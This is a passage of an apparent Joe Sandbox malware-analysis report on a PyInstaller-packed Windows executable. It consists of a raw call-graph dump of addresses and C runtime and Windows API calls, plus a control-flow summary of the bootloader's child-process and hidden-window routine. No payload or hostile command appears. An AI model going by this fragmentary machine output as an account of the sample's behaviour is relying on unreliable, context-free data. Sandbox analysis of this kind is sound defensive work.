17894->17767 17900 7ff6ba3a10e1 __std_exception_copy 17895->17900 17899 7ff6ba3a1129 17896->17899 17907 7ff6ba3a113c 17896->17907 17898 7ff6ba3b4f08 _get_daylight 11 API calls 17897->17898 17901 7ff6ba3a1100 17898->17901 17902 7ff6ba3a1210 92 API calls 17899->17902 17904 7ff6ba3b004c 74 API calls 17900->17904 17903 7ff6ba3a2910 54 API calls 17901->17903 17902->17900 17903->17900 17906 7ff6ba3a11b4 17904->17906 17905 7ff6ba3b039c _fread_nolock 53 API calls 17905->17907 17906->17894 17917 7ff6ba3a46f0 17906->17917 17907->17900 17907->17905 17909 7ff6ba3a11ed 17907->17909 17910 7ff6ba3b4f08 _get_daylight 11 API calls 17909->17910 17911 7ff6ba3a11f2 17910->17911 17912 7ff6ba3a2910 54 API calls 17911->17912 17912->17900 17914 7ff6ba3b0b0c 17913->17914 17931 7ff6ba3b082c 17914->17931 17916 7ff6ba3b0b2a 17916->17805 17918 7ff6ba3a4700 17917->17918 17919 7ff6ba3a9390 2 API calls 17918->17919 17920 7ff6ba3a472b 17919->17920 17921 7ff6ba3a9390 2 API calls 17920->17921 17926 7ff6ba3a479e 17920->17926 17923 7ff6ba3a4746 17921->17923 17922 7ff6ba3ac550 _log10_special 8 API calls 17924 7ff6ba3a47b9 17922->17924 17925 7ff6ba3a474b CreateSymbolicLinkW 17923->17925 17923->17926 17924->17894 17925->17926 17927 7ff6ba3a4775 17925->17927 17926->17922 17927->17926 17928 7ff6ba3a477e GetLastError 17927->17928 17928->17926 17929 7ff6ba3a4789 17928->17929 17930 7ff6ba3a46f0 10 API calls 17929->17930 17930->17926 17932 7ff6ba3b0879 17931->17932 17933 7ff6ba3b084c 17931->17933 17932->17916 17933->17932 17934 7ff6ba3b0881 17933->17934 17935 7ff6ba3b0856 17933->17935 17938 7ff6ba3b076c 17934->17938 17936 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 17935->17936 17936->17932 17945 7ff6ba3b546c EnterCriticalSection 17938->17945 17947 7ff6ba3b5031 17946->17947 17948 7ff6ba3b505e 17946->17948 17950 7ff6ba3b4f08 _get_daylight 11 API calls 17947->17950 17954 7ff6ba3b4fe8 17947->17954 17949 7ff6ba3b5081 17948->17949 17952 7ff6ba3b509d 17948->17952 17951 7ff6ba3b4f08 _get_daylight 11 API calls 17949->17951 17953 7ff6ba3b503b 17950->17953 17955 7ff6ba3b5086 17951->17955 17956 7ff6ba3b4f4c 45 API calls 17952->17956 17957 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17953->17957 17954->17810 17958 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 17955->17958 17960 7ff6ba3b5091 17956->17960 17959 7ff6ba3b5046 17957->17959 17958->17960 17959->17810 17960->17810 17962 7ff6ba3a4136 17961->17962 17963 7ff6ba3b4984 49 API calls 17962->17963 17964 7ff6ba3a415c 17963->17964 17965 7ff6ba3a416d 17964->17965 17966 7ff6ba3a4560 10 API calls 17964->17966 17965->17823 17967 7ff6ba3a417f 17966->17967 17967->17823 17969 7ff6ba3a7d05 17968->17969 17970 7ff6ba3a45c0 108 API calls 17969->17970 17971 7ff6ba3a7d2b 17970->17971 17972 7ff6ba3a7d52 17971->17972 17973 7ff6ba3a45c0 108 API calls 17971->17973 17974 7ff6ba3ac550 _log10_special 8 API calls 17972->17974 17975 7ff6ba3a7d42 17973->17975 17976 7ff6ba3a4277 17974->17976 17977 7ff6ba3a7d4d 17975->17977 17978 7ff6ba3a7d5c 17975->17978 17976->17831 17976->17835 17980 7ff6ba3b004c 74 API calls 17977->17980 17998 7ff6ba3b00e4 17978->17998 17980->17972 17981 7ff6ba3a7dbf 17982 7ff6ba3b004c 74 API calls 17981->17982 17984 7ff6ba3a7de7 17982->17984 17983 7ff6ba3b039c _fread_nolock 53 API calls 17992 7ff6ba3a7d61 17983->17992 17985 7ff6ba3b004c 74 API calls 17984->17985 17985->17972 17986 7ff6ba3a7dc6 17987 7ff6ba3b0110 37 API calls 17986->17987 17989 7ff6ba3a7dc1 17987->17989 17988 7ff6ba3b0adc 76 API calls 17988->17992 17989->17981 18004 7ff6ba3b7318 17989->18004 17990 7ff6ba3b0110 37 API calls 17990->17992 17992->17981 17992->17983 17992->17986 17992->17988 17992->17989 17992->17990 17993 7ff6ba3b00e4 37 API calls 17992->17993 17993->17992 17995 7ff6ba3a1865 17994->17995 17997 7ff6ba3a18d5 17994->17997 17996 7ff6ba3b5024 45 API calls 17995->17996 17995->17997 17996->17995 17997->17850 17997->17851 17999 7ff6ba3b00fd 17998->17999 18000 7ff6ba3b00ed 17998->18000 17999->17992 18001 7ff6ba3b4f08 _get_daylight 11 API calls 18000->18001 18002 7ff6ba3b00f2 18001->18002 18003 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18002->18003 18003->17999 18005 7ff6ba3b7320 18004->18005 18006 7ff6ba3b733c 18005->18006 18007 7ff6ba3b735d 18005->18007 18008 7ff6ba3b4f08 _get_daylight 11 API calls 18006->18008 18023 7ff6ba3b546c EnterCriticalSection 18007->18023 18025 7ff6ba3b5ec8 18024->18025 18026 7ff6ba3b5eee 18025->18026 18029 7ff6ba3b5f21 18025->18029 18027 7ff6ba3b4f08 _get_daylight 11 API calls 18026->18027 18028 7ff6ba3b5ef3 18027->18028 18030 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18028->18030 18031 7ff6ba3b5f34 18029->18031 18032 7ff6ba3b5f27 18029->18032 18033 7ff6ba3a4616 18030->18033 18043 7ff6ba3bac28 18031->18043 18034 7ff6ba3b4f08 _get_daylight 11 API calls 18032->18034 18033->16764 18034->18033 18056 7ff6ba3c02d8 EnterCriticalSection 18043->18056 18417 7ff6ba3b78f8 18416->18417 18420 7ff6ba3b73d4 18417->18420 18419 7ff6ba3b7911 18419->16774 18421 7ff6ba3b741e 18420->18421 18422 7ff6ba3b73ef 18420->18422 18430 7ff6ba3b546c EnterCriticalSection 18421->18430 18424 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 18422->18424 18427 7ff6ba3b740f 18424->18427 18427->18419 18432 7ff6ba3afe71 18431->18432 18433 7ff6ba3afe43 18431->18433 18434 7ff6ba3afe63 18432->18434 18441 7ff6ba3b546c EnterCriticalSection 18432->18441 18435 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 18433->18435 18434->16778 18435->18434 18443 7ff6ba3a45c0 108 API calls 18442->18443 18444 7ff6ba3a1493 18443->18444 18445 7ff6ba3a149b 18444->18445 18446 7ff6ba3a14bc 18444->18446 18447 7ff6ba3a2710 54 API calls 18445->18447 18448 7ff6ba3b06d4 73 API calls 18446->18448 18449 7ff6ba3a14ab 18447->18449 18450 7ff6ba3a14d1 18448->18450 18449->16811 18451 7ff6ba3a14d5 18450->18451 18452 7ff6ba3a14f8 18450->18452 18453 7ff6ba3b4f08 _get_daylight 11 API calls 18451->18453 18455 7ff6ba3a1532 18452->18455 18456 7ff6ba3a1508 18452->18456 18454 7ff6ba3a14da 18453->18454 18457 7ff6ba3a2910 54 API calls 18454->18457 18459 7ff6ba3a1538 18455->18459 18460 7ff6ba3a154b 18455->18460 18458 7ff6ba3b4f08 _get_daylight 11 API calls 18456->18458 18461 7ff6ba3a14f3 __std_exception_copy 18457->18461 18462 7ff6ba3a1510 18458->18462 18463 7ff6ba3a1210 92 API calls 18459->18463 18460->18461 18467 7ff6ba3b039c _fread_nolock 53 API calls 18460->18467 18468 7ff6ba3a15d6 18460->18468 18465 7ff6ba3b004c 74 API calls 18461->18465 18464 7ff6ba3a2910 54 API calls 18462->18464 18463->18461 18464->18461 18466 7ff6ba3a15c4 18465->18466 18466->16811 18467->18460 18469 7ff6ba3b4f08 _get_daylight 11 API calls 18468->18469 18470 7ff6ba3a15db 18469->18470 18471 7ff6ba3a2910 54 API calls 18470->18471 18471->18461 18473 7ff6ba3a9390 2 API calls 18472->18473 18474 7ff6ba3a8e94 LoadLibraryExW 18473->18474 18475 7ff6ba3a8eb3 __std_exception_copy 18474->18475 18475->16845 18477 7ff6ba3a76e9 GetLastError 18476->18477 18478 7ff6ba3a771b GetProcAddress 18476->18478 18549 7ff6ba3a6375 18548->18549 18550 7ff6ba3a1c80 49 API calls 18549->18550 18551 7ff6ba3a63b1 18550->18551 18552 7ff6ba3a63ba 18551->18552 18553 7ff6ba3a63dd 18551->18553 18554 7ff6ba3a2710 54 API calls 18552->18554 18555 7ff6ba3a4630 49 API calls 18553->18555 18556 7ff6ba3a63d3 18554->18556 18557 7ff6ba3a63f5 18555->18557 18560 7ff6ba3ac550 _log10_special 8 API calls 18556->18560 18558 7ff6ba3a6413 18557->18558 18561 7ff6ba3a2710 54 API calls 18557->18561 18559 7ff6ba3a4560 10 API calls 18558->18559 18562 7ff6ba3a641d 18559->18562 18563 7ff6ba3a336e 18560->18563 18561->18558 18564 7ff6ba3a642b 18562->18564 18565 7ff6ba3a8e80 3 API calls 18562->18565 18563->16885 18579 7ff6ba3a6500 18563->18579 18566 7ff6ba3a4630 49 API calls 18564->18566 18565->18564 18567 7ff6ba3a6444 18566->18567 18568 7ff6ba3a6469 18567->18568 18569 7ff6ba3a6449 18567->18569 18571 7ff6ba3a8e80 3 API calls 18568->18571 18570 7ff6ba3a2710 54 API calls 18569->18570 18570->18556 18572 7ff6ba3a6476 18571->18572 18573 7ff6ba3a64c1 18572->18573 18574 7ff6ba3a6482 18572->18574 18638 7ff6ba3a5830 GetProcAddress 18573->18638 18576 7ff6ba3a9390 2 API calls 18574->18576 18577 7ff6ba3a649a GetLastError 18576->18577 18578 7ff6ba3a2c50 51 API calls 18577->18578 18578->18556 18728 7ff6ba3a5400 18579->18728 18581 7ff6ba3a6526 18582 7ff6ba3a653f 18581->18582 18583 7ff6ba3a652e 18581->18583 18735 7ff6ba3a4c90 18582->18735 18584 7ff6ba3a2710 54 API calls 18583->18584 18615 7ff6ba3a653a 18584->18615 18587 7ff6ba3a654b 18589 7ff6ba3a2710 54 API calls 18587->18589 18588 7ff6ba3a655c 18590 7ff6ba3a656c 18588->18590 18592 7ff6ba3a657d 18588->18592 18589->18615 18591 7ff6ba3a2710 54 API calls 18590->18591 18591->18615 18593 7ff6ba3a65ad 18592->18593 18594 7ff6ba3a659c 18592->18594 18596 7ff6ba3a65cd 18593->18596 18597 7ff6ba3a65bc 18593->18597 18595 7ff6ba3a2710 54 API calls 18594->18595 18595->18615 18739 7ff6ba3a4d50 18596->18739 18598 7ff6ba3a2710 54 API calls 18597->18598 18598->18615 18615->16881 18617 7ff6ba3a6070 18616->18617 18617->18617 18618 7ff6ba3a6099 18617->18618 18623 7ff6ba3a60b0 __std_exception_copy 18617->18623 18619 7ff6ba3a2710 54 API calls 18618->18619 18620 7ff6ba3a60a5 18619->18620 18620->16883 18621 7ff6ba3a61bb 18621->16883 18622 7ff6ba3a1470 116 API calls 18622->18623 18623->18621 18623->18622 18624 7ff6ba3a2710 54 API calls 18623->18624 18624->18623 18626 7ff6ba3a6235 18625->18626 18629 7ff6ba3a620c 18625->18629 18629->18626 18639 7ff6ba3a587f GetProcAddress 18638->18639 18640 7ff6ba3a5852 GetLastError 18638->18640 18642 7ff6ba3a589b GetLastError 18639->18642 18643 7ff6ba3a58aa GetProcAddress 18639->18643 18641 7ff6ba3a585f 18640->18641 18644 7ff6ba3a2c50 51 API calls 18641->18644 18642->18641 18645 7ff6ba3a58d5 GetProcAddress 18643->18645 18646 7ff6ba3a58c6 GetLastError 18643->18646 18649 7ff6ba3a5874 18644->18649 18647 7ff6ba3a58f1 GetLastError 18645->18647 18648 7ff6ba3a5903 GetProcAddress 18645->18648 18646->18641 18647->18641 18650 7ff6ba3a591f GetLastError 18648->18650 18651 7ff6ba3a5931 GetProcAddress 18648->18651 18649->18556 18650->18641 18652 7ff6ba3a595f GetProcAddress 18651->18652 18653 7ff6ba3a594d GetLastError 18651->18653 18654 7ff6ba3a597b GetLastError 18652->18654 18655 7ff6ba3a598d GetProcAddress 18652->18655 18653->18641 18654->18655 18730 7ff6ba3a542c 18728->18730 18729 7ff6ba3a5434 18729->18581 18730->18729 18732 7ff6ba3a55d4 18730->18732 18759 7ff6ba3b6aa4 18730->18759 18731 7ff6ba3a5797 __std_exception_copy 18731->18581 18732->18731 18733 7ff6ba3a47d0 47 API calls 18732->18733 18733->18732 18736 7ff6ba3a4cc0 18735->18736 18737 7ff6ba3ac550 _log10_special 8 API calls 18736->18737 18738 7ff6ba3a4d2a 18737->18738 18738->18587 18738->18588 18740 7ff6ba3a4d65 18739->18740 18760 7ff6ba3b6ad4 18759->18760 18763 7ff6ba3b5fa0 18760->18763 18762 7ff6ba3b6b04 18762->18730 18764 7ff6ba3b5fd1 18763->18764 18765 7ff6ba3b5fe3 18763->18765 18767 7ff6ba3b4f08 _get_daylight 11 API calls 18764->18767 18766 7ff6ba3b602d 18765->18766 18769 7ff6ba3b5ff0 18765->18769 18770 7ff6ba3b6048 18766->18770 18773 7ff6ba3b47c0 45 API calls 18766->18773 18768 7ff6ba3b5fd6 18767->18768 18771 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18768->18771 18772 7ff6ba3ba814 _invalid_parameter_noinfo 37 API calls 18769->18772 18776 7ff6ba3b606a 18770->18776 18784 7ff6ba3b6a2c 18770->18784 18781 7ff6ba3b5fe1 18771->18781 18772->18781 18773->18770 18775 7ff6ba3b610b 18777 7ff6ba3b4f08 _get_daylight 11 API calls 18775->18777 18775->18781 18776->18775 18778 7ff6ba3b4f08 _get_daylight 11 API calls 18776->18778 18780 7ff6ba3b61b6 18777->18780 18779 7ff6ba3b6100 18778->18779 18782 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18779->18782 18783 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18780->18783 18781->18762 18782->18775 18783->18781 18785 7ff6ba3b6a4f 18784->18785 18786 7ff6ba3b6a66 18784->18786 18790 7ff6ba3bff68 18785->18790 18789 7ff6ba3b6a54 18786->18789 18795 7ff6ba3bff98 18786->18795 18789->18770 18791 7ff6ba3bb150 _CreateFrameInfo 45 API calls 18790->18791 18792 7ff6ba3bff71 18791->18792 18793 7ff6ba3bd984 45 API calls 18792->18793 18794 7ff6ba3bff8a 18793->18794 18794->18789 18796 7ff6ba3b4f4c 45 API calls 18795->18796 18797 7ff6ba3bffd1 18796->18797 18801 7ff6ba3bffdd 18797->18801 18802 7ff6ba3c2e40 18797->18802 18798 7ff6ba3ac550 _log10_special 8 API calls 18801->18798 18803 7ff6ba3b4f4c 45 API calls 18802->18803 18836->16888 18942 7ff6ba3acb50 18943 7ff6ba3acb60 18942->18943 18959 7ff6ba3b9ba8 18943->18959 18945 7ff6ba3acb6c 18965 7ff6ba3ace48 18945->18965 18947 7ff6ba3ad12c 7 API calls 18950 7ff6ba3acc05 18947->18950 18948 7ff6ba3acb84 _RTC_Initialize 18957 7ff6ba3acbd9 18948->18957 18970 7ff6ba3acff8 18948->18970 18951 7ff6ba3acb99 18973 7ff6ba3b9014 18951->18973 18957->18947 18958 7ff6ba3acbf5 18957->18958 18960 7ff6ba3b9bb9 18959->18960 18961 7ff6ba3b9bc1 18960->18961 18962 7ff6ba3b4f08 _get_daylight 11 API calls 18960->18962 18961->18945 18963 7ff6ba3b9bd0 18962->18963 18964 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18963->18964 18964->18961 18966 7ff6ba3ace5e __scrt_release_startup_lock 18965->18966 18967 7ff6ba3ace59 18965->18967 18966->18948 18967->18966 18968 7ff6ba3ad12c 7 API calls 18967->18968 18969 7ff6ba3aced2 18968->18969 18998 7ff6ba3acfbc 18970->18998 18972 7ff6ba3ad001 18972->18951 18974 7ff6ba3b9034 18973->18974 18981 7ff6ba3acba5 18973->18981 18975 7ff6ba3b9052 GetModuleFileNameW 18974->18975 18976 7ff6ba3b903c 18974->18976 18978 7ff6ba3b907d 18975->18978 18977 7ff6ba3b4f08 _get_daylight 11 API calls 18976->18977 18979 7ff6ba3b9041 18977->18979 19013 7ff6ba3b8fb4 18978->19013 18980 7ff6ba3ba8e0 _invalid_parameter_noinfo 37 API calls 18979->18980 18980->18981 18981->18957 18997 7ff6ba3ad0cc InitializeSListHead 18981->18997 18984 7ff6ba3b90c5 18985 7ff6ba3b4f08 _get_daylight 11 API calls 18984->18985 18986 7ff6ba3b90ca 18985->18986 18987 7ff6ba3ba948 __free_lconv_mon 11 API calls 18986->18987 18987->18981 18988 7ff6ba3b90ff 18990 7ff6ba3ba948 __free_lconv_mon 11 API calls 18988->18990 18989 7ff6ba3b90dd 18989->18988 18991 7ff6ba3b9144 18989->18991 18992 7ff6ba3b912b 18989->18992 18990->18981 18995 7ff6ba3ba948 __free_lconv_mon 11 API calls 18991->18995 18993 7ff6ba3ba948 __free_lconv_mon 11 API calls 18992->18993 18994 7ff6ba3b9134 18993->18994 18996 7ff6ba3ba948 __free_lconv_mon 11 API calls 18994->18996 18995->18988 18996->18981 18999 7ff6ba3acfd6 18998->18999 19001 7ff6ba3acfcf 18998->19001 19002 7ff6ba3ba1ec 18999->19002 19001->18972 19005 7ff6ba3b9e28 19002->19005 19012 7ff6ba3c02d8 EnterCriticalSection 19005->19012 19014 7ff6ba3b9004 19013->19014 19015 7ff6ba3b8fcc 19013->19015 19014->18984 19014->18989 19015->19014 19016 7ff6ba3beb98 _get_daylight 11 API calls 19015->19016 19017 7ff6ba3b8ffa 19016->19017 19018 7ff6ba3ba948 __free_lconv_mon 11 API calls 19017->19018 19018->19014 19019 7ff6ba3b9d50 19022 7ff6ba3b9ccc 19019->19022 19029 7ff6ba3c02d8 EnterCriticalSection 19022->19029 19366 7ff6ba3bafd0 19367 7ff6ba3bafea 19366->19367 19368 7ff6ba3bafd5 19366->19368 19372 7ff6ba3baff0 19368->19372 19373 7ff6ba3bb03a 19372->19373 19374 7ff6ba3bb032 19372->19374 19375 7ff6ba3ba948 __free_lconv_mon 11 API calls 19373->19375 19376 7ff6ba3ba948 __free_lconv_mon 11 API calls 19374->19376 19377 7ff6ba3bb047 19375->19377 19376->19373 19378 7ff6ba3ba948 __free_lconv_mon 11 API calls 19377->19378 19379 7ff6ba3bb054 19378->19379 19380 7ff6ba3ba948 __free_lconv_mon 11 API calls 19379->19380 19381 7ff6ba3bb061 19380->19381 19382 7ff6ba3ba948 __free_lconv_mon 11 API calls 19381->19382 19383 7ff6ba3bb06e 19382->19383 19384 7ff6ba3ba948 __free_lconv_mon 11 API calls 19383->19384 19385 7ff6ba3bb07b 19384->19385 19386 7ff6ba3ba948 __free_lconv_mon 11 API calls 19385->19386 19387 7ff6ba3bb088 19386->19387 19388 7ff6ba3ba948 __free_lconv_mon 11 API calls 19387->19388 19389 7ff6ba3bb095 19388->19389 19390 7ff6ba3ba948 __free_lconv_mon 11 API calls 19389->19390 19391 7ff6ba3bb0a5 19390->19391 19392 7ff6ba3ba948 __free_lconv_mon 11 API calls 19391->19392 19393 7ff6ba3bb0b5 19392->19393 19398 7ff6ba3bae94 19393->19398 19412 7ff6ba3c02d8 EnterCriticalSection 19398->19412 15899 7ff6ba3b9961 15911 7ff6ba3ba3d8 15899->15911 15916 7ff6ba3bb150 GetLastError 15911->15916 15917 7ff6ba3bb191 FlsSetValue 15916->15917 15918 7ff6ba3bb174 FlsGetValue 15916->15918 15920 7ff6ba3bb1a3 15917->15920 15935 7ff6ba3bb181 SetLastError 15917->15935 15919 7ff6ba3bb18b 15918->15919 15918->15935 15919->15917 15947 7ff6ba3beb98 15920->15947 15923 7ff6ba3bb21d 15926 7ff6ba3ba504 _CreateFrameInfo 38 API calls 15923->15926 15924 7ff6ba3ba3e1 15938 7ff6ba3ba504 15924->15938 15931 7ff6ba3bb222 15926->15931 15927 7ff6ba3bb1d0 FlsSetValue 15929 7ff6ba3bb1ee 15927->15929 15930 7ff6ba3bb1dc FlsSetValue 15927->15930 15928 7ff6ba3bb1c0 FlsSetValue 15932 7ff6ba3bb1c9 15928->15932 15960 7ff6ba3baef4 15929->15960 15930->15932 15954 7ff6ba3ba948 15932->15954 15935->15923 15935->15924 16008 7ff6ba3c3650 15938->16008 15952 7ff6ba3beba9 _get_daylight 15947->15952 15948 7ff6ba3bebfa 15968 7ff6ba3b4f08 15948->15968 15949 7ff6ba3bebde HeapAlloc 15951 7ff6ba3bb1b2 15949->15951 15949->15952 15951->15927 15951->15928 15952->15948 15952->15949 15965 7ff6ba3c3590 15952->15965 15955 7ff6ba3ba94d RtlFreeHeap 15954->15955 15959 7ff6ba3ba97c 15954->15959 15956 7ff6ba3ba968 GetLastError 15955->15956 15955->15959 15957 7ff6ba3ba975 __free_lconv_mon 15956->15957 15958 7ff6ba3b4f08 _get_daylight 9 API calls 15957->15958 15958->15959 15959->15935 15994 7ff6ba3badcc 15960->15994 15971 7ff6ba3c35d0 15965->15971 15977 7ff6ba3bb2c8 GetLastError 15968->15977 15970 7ff6ba3b4f11 15970->15951 15976 7ff6ba3c02d8 EnterCriticalSection 15971->15976 15978 7ff6ba3bb309 FlsSetValue 15977->15978 15982 7ff6ba3bb2ec 15977->15982 15979 7ff6ba3bb31b 15978->15979 15991 7ff6ba3bb2f9 15978->15991 15981 7ff6ba3beb98 _get_daylight 5 API calls 15979->15981 15980 7ff6ba3bb375 SetLastError 15980->15970 15983 7ff6ba3bb32a 15981->15983 15982->15978 15982->15991 15984 7ff6ba3bb348 FlsSetValue 15983->15984 15985 7ff6ba3bb338 FlsSetValue 15983->15985 15987 7ff6ba3bb354 FlsSetValue 15984->15987 15988 7ff6ba3bb366 15984->15988 15986 7ff6ba3bb341 15985->15986 15989 7ff6ba3ba948 __free_lconv_mon 5 API calls 15986->15989 15987->15986 15990 7ff6ba3baef4 _get_daylight 5 API calls 15988->15990 15989->15991 15992 7ff6ba3bb36e 15990->15992 15991->15980 15993 7ff6ba3ba948 __free_lconv_mon 5 API calls 15992->15993 15993->15980 16006 7ff6ba3c02d8 EnterCriticalSection 15994->16006 16042 7ff6ba3c3608 16008->16042 16047 7ff6ba3c02d8 EnterCriticalSection 16042->16047 16112 7ff6ba3abae0 16113 7ff6ba3abb0e 16112->16113 16114 7ff6ba3abaf5 16112->16114 16114->16113 16117 7ff6ba3bd5fc 16114->16117 16118 7ff6ba3bd647 16117->16118 16122 7ff6ba3bd60b _get_daylight 16117->16122 16119 7ff6ba3b4f08 _get_daylight 11 API calls 16118->16119 16121 7ff6ba3abb6e 16119->16121 16120 7ff6ba3bd62e HeapAlloc 16120->16121 16120->16122 16122->16118 16122->16120 16123 7ff6ba3c3590 _get_daylight 2 API calls 16122->16123 16123->16122 19414 7ff6ba3cabe3 19415 7ff6ba3cabf3 19414->19415 19418 7ff6ba3b5478 LeaveCriticalSection 19415->19418 19091 7ff6ba3cad69 19094 7ff6ba3b5478 LeaveCriticalSection 19091->19094

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                        control_flow_graph 0 7ff6ba3a89e0-7ff6ba3a8b26 call 7ff6ba3ac850 call 7ff6ba3a9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6ba3b53f0 call 7ff6ba3ba47c call 7ff6ba3b871c call 7ff6ba3b53f0 call 7ff6ba3ba47c call 7ff6ba3b871c call 7ff6ba3b53f0 call 7ff6ba3ba47c call 7ff6ba3b871c GetCommandLineW CreateProcessW 23 7ff6ba3a8b28-7ff6ba3a8b48 GetLastError call 7ff6ba3a2c50 0->23 24 7ff6ba3a8b4d-7ff6ba3a8b89 RegisterClassW 0->24 31 7ff6ba3a8e39-7ff6ba3a8e5f call 7ff6ba3ac550 23->31 26 7ff6ba3a8b91-7ff6ba3a8be5 CreateWindowExW 24->26 27 7ff6ba3a8b8b GetLastError 24->27 29 7ff6ba3a8bef-7ff6ba3a8bf4 ShowWindow 26->29 30 7ff6ba3a8be7-7ff6ba3a8bed GetLastError 26->30 27->26 32 7ff6ba3a8bfa-7ff6ba3a8c0a WaitForSingleObject 29->32 30->32 34 7ff6ba3a8c88-7ff6ba3a8c8f 32->34 35 7ff6ba3a8c0c 32->35 36 7ff6ba3a8c91-7ff6ba3a8ca1 WaitForSingleObject 34->36 37 7ff6ba3a8cd2-7ff6ba3a8cd9 34->37 39 7ff6ba3a8c10-7ff6ba3a8c13 35->39 40 7ff6ba3a8df8-7ff6ba3a8e02 36->40 41 7ff6ba3a8ca7-7ff6ba3a8cb7 TerminateProcess 36->41 42 7ff6ba3a8dc0-7ff6ba3a8dd9 GetMessageW 37->42 43 7ff6ba3a8cdf-7ff6ba3a8cf5 QueryPerformanceFrequency QueryPerformanceCounter 37->43 44 7ff6ba3a8c15 GetLastError 39->44 45 7ff6ba3a8c1b-7ff6ba3a8c22 39->45 46 7ff6ba3a8e11-7ff6ba3a8e35 GetExitCodeProcess CloseHandle * 2 40->46 47 7ff6ba3a8e04-7ff6ba3a8e0a DestroyWindow 40->47 48 7ff6ba3a8cbf-7ff6ba3a8ccd WaitForSingleObject 41->48 49 7ff6ba3a8cb9 GetLastError 41->49 52 7ff6ba3a8def-7ff6ba3a8df6 42->52 53 7ff6ba3a8ddb-7ff6ba3a8de9 TranslateMessage DispatchMessageW 42->53 50 7ff6ba3a8d00-7ff6ba3a8d38 MsgWaitForMultipleObjects PeekMessageW 43->50 44->45 45->36 51 7ff6ba3a8c24-7ff6ba3a8c41 PeekMessageW 45->51 46->31 47->46 48->40 49->48 54 7ff6ba3a8d73-7ff6ba3a8d7a 50->54 55 7ff6ba3a8d3a 50->55 56 7ff6ba3a8c43-7ff6ba3a8c74 TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff6ba3a8c76-7ff6ba3a8c86 WaitForSingleObject 51->57 52->40 52->42 53->52 54->42 59 7ff6ba3a8d7c-7ff6ba3a8da5 QueryPerformanceCounter 54->59 58 7ff6ba3a8d40-7ff6ba3a8d71 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->34 57->39 58->54 58->58 59->50 60 7ff6ba3a8dab-7ff6ba3a8db2 59->60 60->40 61 7ff6ba3a8db4-7ff6ba3a8db8 60->61 61->42
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2265917622.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265879282.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2265966359.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266008626.00007FF6BA3E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: c185ad2ac7251cea98abc6702faec32d401d285ff3d3618ac024875ed806b77b
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22D13E32A08B9286EB109F78E8542AD77A5FF84B58F404275EF5ED3AA4EF3CD5458700

                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                        • Not Executed
